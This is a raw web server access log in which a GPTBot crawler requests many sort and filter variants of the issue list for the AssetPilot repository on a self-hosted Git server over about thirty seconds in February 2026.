"/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:17:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:17:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:17:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:17:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:17:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:17:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:17:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:17:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:17:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:17:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" 